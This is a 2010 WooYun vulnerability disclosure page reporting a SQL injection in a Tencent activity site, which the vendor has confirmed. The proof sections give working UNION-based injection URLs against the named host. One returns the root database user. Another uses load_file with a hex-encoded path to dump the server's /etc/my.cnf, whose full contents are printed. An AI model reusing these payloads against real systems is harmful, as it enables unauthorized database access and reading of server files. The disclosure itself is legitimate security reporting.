当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2010-0636

漏洞标题:腾讯某频道SQL注射漏洞

相关厂商:腾讯

漏洞作者: Jannock

提交时间:2010-09-30 01:09

修复时间:2010-10-30 03:00

公开时间:2010-10-30 03:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2010-09-30: 细节已通知厂商并且等待厂商处理中
2010-09-30: 厂商已经确认,细节仅向厂商公开
2010-10-10: 细节向核心白帽子及相关领域专家公开
2010-10-20: 细节向普通白帽子公开
2010-10-30: 细节向实习白帽子公开
2010-10-30: 细节向公众公开

简要描述:

腾讯某频道SQL注射漏洞

详细说明:

http://changancx20.act.qq.com/c/searchone?search=1329517103 and 1=2 union select 1,2,3,4,5,6,7,8,9,0,1,user(),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3--
http://changancx20.act.qq.com/c/searchone?search=1329517103 and 1=2 union select 1,2,3,4,5,6,7,8,9,0,1,load_file(0x2F6574632F6D792E636E66),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3--
Mysql也是ROOT 权限哦。

漏洞证明:

http://changancx20.act.qq.com/c/searchone?search=1329517103 and 1=2 union select 1,2,3,4,5,6,7,8,9,0,1,user(),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3--
root@10.130.19.22
http://changancx20.act.qq.com/c/searchone?search=1329517103 and 1=2 union select 1,2,3,4,5,6,7,8,9,0,1,load_file(0x2F6574632F6D792E636E66),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3--
# Example MySQL config file for medium systems. # # This is for a system with little memory (32M - 64M) where MySQL plays # an important part, or systems up to 128M where MySQL is used together with # other programs (such as a web server) # # You can copy this file to # /etc/my.cnf to set global options, # mysql-data-dir/my.cnf to set server-specific options (in this # installation this directory is /var/lib/mysql) or # ~/.my.cnf to set user-specific options. # # In this file, you can use all long options that a program supports. # If you want to know which options a program supports, run the program # with the "--help" option. # The following options will be passed to all MySQL clients [client] #password = your_password port = 3306 #socket = /var/run/mysql/mysql.sock socket = /tmp/mysql.sock # Here follows entries for some specific programs # The MySQL server [mysqld] port = 3306 bind-address = 172.16.56.110 #socket = /var/run/mysql/mysql.sock socket = /tmp/mysql.sock skip-locking key_buffer = 16M max_allowed_packet = 10M max_connections=1000 wait_timeout = 2880000 interactive_timeout = 2880000 table_cache = 64 sort_buffer_size = 512M net_buffer_length = 8K myisam_sort_buffer_size = 8M #key_buffer = 1024M #max_allowed_packet = 1M #table_cache = 64 #sort_buffer_size = 512K #net_buffer_length = 8K #myisam_sort_buffer_size = 8M #max_connections = 1000 # Don't listen on a TCP/IP port at all. This can be a security enhancement, # if all processes that need to connect to mysqld run on the same host. # All interaction with mysqld must be made via Unix sockets or named pipes. # Note that using this option without enabling named pipes on Windows # (via the "enable-named-pipe" option) will render mysqld useless! # #skip-networking # Replication Master Server (default) # binary logging is required for replication log-bin # required unique id between 1 and 2^32 - 1 # defaults to 1 if master-host is not set # but will not function as a master if omitted server-id = 1 # Replication Slave (comment out master section to use this) # # To configure this host as a replication slave, you can choose between # two methods : # # 1) Use the CHANGE MASTER TO command (fully described in our manual) - # the syntax is: # # CHANGE MASTER TO MASTER_HOST=, MASTER_PORT=, # MASTER_USER=, MASTER_PASSWORD= ; # # where you replace , , by quoted strings and # by the master's port number (3306 by default). # # Example: # # CHANGE MASTER TO MASTER_HOST='125.564.12.1', MASTER_PORT=3306, # MASTER_USER='joe', MASTER_PASSWORD='secret'; # # OR # # 2) Set the variables below. However, in case you choose this method, then # start replication for the first time (even unsuccessfully, for example # if you mistyped the password in master-password and the slave fails to # connect), the slave will create a master.info file, and any later # change in this file to the variables' values below will be ignored and # overridden by the content of the master.info file, unless you shutdown # the slave server, delete master.info and restart the slaver server. # For that reason, you may want to leave the lines below untouched # (commented) and instead use CHANGE MASTER TO (see above) # # required unique id between 2 and 2^32 - 1 # (and different from the master) # defaults to 2 if master-host is set # but will not function as a slave if omitted #server-id = 2 # # The replication master for this slave - required #master-host = # # The username the slave will use for authentication when connecting # to the master - required #master-user = # # The password the slave will authenticate with when connecting to # the master - required #master-password = # # The port the master is listening on. # optional - defaults to 3306 #master-port = # # binary logging - not required for slaves, but recommended #log-bin # Point the following paths to different dedicated disks #tmpdir = /tmp/ #log-update = /path-to-dedicated-directory/hostname # Uncomment the following if you are using BDB tables #bdb_cache_size = 4M #bdb_max_lock = 10000 # Uncomment the following if you are using InnoDB tables #innodb_data_home_dir = /var/lib/mysql/ #innodb_data_file_path = ibdata1:10M:autoextend #innodb_log_group_home_dir = /var/lib/mysql/ #innodb_log_arch_dir = /var/lib/mysql/ # You can set .._buffer_pool_size up to 50 - 80 % # of RAM but beware of setting memory usage too high innodb_buffer_pool_size = 1024M innodb_additional_mem_pool_size = 10M # Set .._log_file_size to 25 % of buffer pool size #innodb_log_file_size = 100M innodb_log_buffer_size = 50M innodb_flush_log_at_trx_commit = 0 innodb_lock_wait_timeout = 50 [mysqldump] quick max_allowed_packet = 16M [mysql] no-auto-rehash # Remove the next comment character if you are not familiar with SQL #safe-updates [isamchk] key_buffer = 20M sort_buffer_size = 20M read_buffer = 2M write_buffer = 2M [myisamchk] key_buffer = 20M sort_buffer_size = 20M read_buffer = 2M write_buffer = 2M [mysqlhotcopy] interactive-timeout

修复方案:

版权声明:转载请注明来源 Jannock@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2010-09-30 10:34

厂商回复:

thanks

最新状态:

暂无


漏洞评价:

评论